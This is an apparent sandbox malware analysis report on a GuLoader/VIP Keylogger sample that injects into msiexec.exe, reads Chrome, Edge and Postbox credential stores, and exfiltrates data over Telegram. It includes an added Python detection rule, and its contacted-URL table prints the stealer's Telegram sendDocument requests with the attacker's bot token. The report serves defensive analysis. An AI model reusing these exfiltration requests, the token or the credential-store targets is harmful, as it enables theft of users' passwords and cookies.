            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\pedido-035241.exeCode function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034F7

            Stealing of Sensitive Information

Source: Yara match; File source: 00000006.00000002.2981297005.00000000243D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: msiexec.exe PID: 8000, type: MEMORYSTR
Source: Yara match; File source: 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\msiexec.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\SysWOW64\msiexec.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\msiexec.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\msiexec.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\msiexec.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\SysWOW64\msiexec.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\msiexec.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Windows\SysWOW64\msiexec.exe; File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: Yara match; File source: 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: msiexec.exe PID: 8000, type: MEMORYSTR
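The file opens listed above give a concrete detection rule: a process that is not the browser reading Chrome or Edge profile stores, made more suspicious when that process is msiexec.exe started by powershell.exe, which is the chain in this report's process tree. The Python below is an added example and not part of the Joe Sandbox report; its event schema, the allow-lists and every PID except the report's msiexec.exe PID 8000 are constructed for illustration.

```python
"""Detection logic for the behaviour in the section above: a script host
(powershell.exe) starting a Windows LOLBin (msiexec.exe), and a process
other than the browser itself opening Chrome/Edge credential and history
stores. Added example; the event schema and all PIDs except 8000 are
constructed, not taken from the report."""
import re

# Processes that legitimately open their own profile databases.
BROWSER_IMAGES = {"chrome.exe", "msedge.exe"}

# Script host and LOLBin the report shows in its process tree. A real
# deployment would extend both sets; this is the minimum the report supports.
SCRIPT_HOSTS = {"powershell.exe"}
LOLBIN_TARGETS = {"msiexec.exe"}

# Chrome/Edge stores listed in the report under "File opened".
CRED_STORE_RE = re.compile(
    r"\\(?:Google\\Chrome|Microsoft\\Edge)\\User Data\\[^\\]+\\"
    r"(?:Login Data|Network\\Cookies|Web Data|History|Top Sites)$",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (severity, pid, message) tuples for suspicious events.

    A credential-store read is 'medium' on its own and 'high' when the
    reading process was itself a LOLBin spawned from a script host, which
    is the chain the report's behaviour graph shows."""
    alerts = []
    lolbins_from_script = set()
    for ev in events:
        if ev["type"] == "process_create":
            child = basename(ev["image"])
            parent = basename(ev["parent_image"])
            if parent in SCRIPT_HOSTS and child in LOLBIN_TARGETS:
                lolbins_from_script.add(ev["pid"])
                alerts.append(("medium", ev["pid"], f"{parent} started {child}"))
        elif ev["type"] == "file_open":
            image = basename(ev["image"])
            if image not in BROWSER_IMAGES and CRED_STORE_RE.search(ev["target"]):
                severity = "high" if ev["pid"] in lolbins_from_script else "medium"
                alerts.append((severity, ev["pid"], f"{image} opened {ev['target']}"))
    return alerts


# Constructed events mirroring the report's process tree and file opens.
# PID 8000 is the report's msiexec.exe; the other PIDs and the explorer.exe
# parent are made up.
SAMPLE_EVENTS = [
    {"type": "process_create", "pid": 7000, "image": r"C:\Users\user\Desktop\pedido-035241.exe",
     "parent_image": r"C:\Windows\explorer.exe"},
    {"type": "process_create", "pid": 7100,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Users\user\Desktop\pedido-035241.exe"},
    {"type": "process_create", "pid": 8000, "image": r"C:\Windows\SysWOW64\msiexec.exe",
     "parent_image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"},
    {"type": "file_open", "pid": 8000, "image": r"C:\Windows\SysWOW64\msiexec.exe",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"type": "file_open", "pid": 8000, "image": r"C:\Windows\SysWOW64\msiexec.exe",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"},
    {"type": "file_open", "pid": 8000, "image": r"C:\Windows\SysWOW64\msiexec.exe",
     "target": r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"},
    # Benign: the browser reading its own store must not alert.
    {"type": "file_open", "pid": 4242, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
]

if __name__ == "__main__":
    for severity, pid, message in detect(SAMPLE_EVENTS):
        print(f"[{severity}] pid={pid} {message}")
```

The PostboxApp profile directory opened in the same section is not covered by the regex; a production rule would add mail-client profile paths to it in the same way.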

            Remote Access Functionality

Source: Yara match; File source: 00000006.00000002.2981297005.00000000243D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: msiexec.exe PID: 8000, type: MEMORYSTR
Source: Yara match; File source: 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
ATT&CK matrix, listed by tactic (the number before a technique is the count shown in that cell):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: 1 Windows Management Instrumentation; 2 PowerShell; At; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: 1 DLL Side-Loading; 1 Registry Run Keys / Startup Folder; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: 1 DLL Side-Loading; 1 Access Token Manipulation; 311 Process Injection; 1 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: 2 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 11 Masquerading; 31 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 311 Process Injection
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 2 File and Directory Discovery; 14 System Information Discovery; 11 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 1 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: 1 Web Service; 3 Ingress Tool Transfer; 11 Encrypted Channel; 4 Non-Application Layer Protocol; 15 Application Layer Protocol; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Behavior Graph (ID: 1576204; Sample: pedido-035241.exe; Start date: 16/12/2024; Architecture: WINDOWS; Score: 100)

Start (node 2)
  Domains/IPs: reallyfreegeoip.org (node 34); api.telegram.org (node 36); 4 other IPs or domains
  Signatures: Found malware configuration; Yara detected VIP Keylogger; Yara detected GuLoader; 4 other signatures
  reallyfreegeoip.org: Tries to detect the country of the analysis system (by using the IP)
  api.telegram.org: Uses the Telegram API (likely for C&C communication)
  Started: pedido-035241.exe (node 8; counts shown: 1 33)

pedido-035241.exe (node 8)
  Dropped: C:\Users\user\AppData\Local\...\takelma.Uns (Unicode); C:\Users\user\AppData\Local\...\nsExec.dll (PE32)
  Signatures: Suspicious powershell command line found
  Started: powershell.exe (node 12; count shown: 30)

powershell.exe (node 12)
  Dropped: C:\Users\user\AppData\...\pedido-035241.exe (PE32)
  Signatures: Early bird code injection technique detected; Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; 3 other signatures
  Started: msiexec.exe (node 16; counts shown: 15 8); conhost.exe (node 20)

msiexec.exe (node 16)
  Network: api.telegram.org 149.154.167.220, ports 443, 49880, 49901, TELEGRAMRU, United Kingdom; 158.101.44.242, ports 49828, 49835, 49842, ORACLE-BMC-31898US, United States; 4 other IPs or domains
  Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)

Antivirus detection, sample (Source | Detection | Scanner):
pedido-035241.exe | 5% | ReversingLabs

Antivirus detection, dropped files (Source | Detection | Scanner):
C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Flyvevaabnene\pedido-035241.exe | 5% | ReversingLabs
C:\Users\user\AppData\Local\Temp\nso7E83.tmp\nsExec.dll | 0% | ReversingLabs

The remaining three antivirus tables report no antivirus matches.
Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
drive.google.com | 172.217.19.174 | true | false | - | high
drive.usercontent.google.com | 142.250.181.97 | true | false | - | high
reallyfreegeoip.org | 104.21.67.152 | true | false | - | high
api.telegram.org | 149.154.167.220 | true | false | - | high
checkip.dyndns.com | 193.122.6.168 | true | false | - | high
checkip.dyndns.org | unknown | unknown | false | - | high
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
https://reallyfreegeoip.org/xml/8.46.123.189 | false | - | high
https://api.telegram.org/bot7268913379:AAGd-tQ4vpps-mce2n9ECDznKp3DeHYACWw/sendDocument?chat_id=7763958191&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery | false | - | high
http://checkip.dyndns.org/ | false | - | high
https://api.telegram.org/bot7268913379:AAGd-tQ4vpps-mce2n9ECDznKp3DeHYACWw/sendDocument?chat_id=7763958191&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery | false | - | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:745773%0D%0ADate%20and%20Time:%2017/12/2024%20/%2018:38:32%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20745773%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | - | high
URLs from memory strings (Name | Source | Malicious | Antivirus Detection | Reputation):
https://www.office.com/ | msiexec.exe, 00000006.00000002.2981297005.00000000245C3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.00000000245B4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/chrome_newtab | msiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/ac/?q= | msiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://api.telegram.org | msiexec.exe, 00000006.00000002.2981297005.0000000024575000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.00000000244B5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | msiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://api.telegram.org/bot | msiexec.exe, 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://translate.google.com/translate_a/element.js | msiexec.exe, 00000006.00000003.2471471790.000000000894B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2471471790.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2471549255.0000000008957000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.office.com/lB | msiexec.exe, 00000006.00000002.2981297005.00000000245BE000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | msiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://drive.usercontent.google.com/ | msiexec.exe, 00000006.00000003.2530503003.0000000008952000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2967421092.0000000008939000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2528720464.0000000008957000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://checkip.dyndns.org | msiexec.exe, 00000006.00000002.2981297005.00000000243D1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | msiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | msiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.000000002551E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.000000002564D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.00000000254F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.0000000025750000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.00000000254A9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://nsis.sf.net/NSIS_ErrorError | pedido-035241.exe, pedido-035241.exe.1.dr | false | - | high
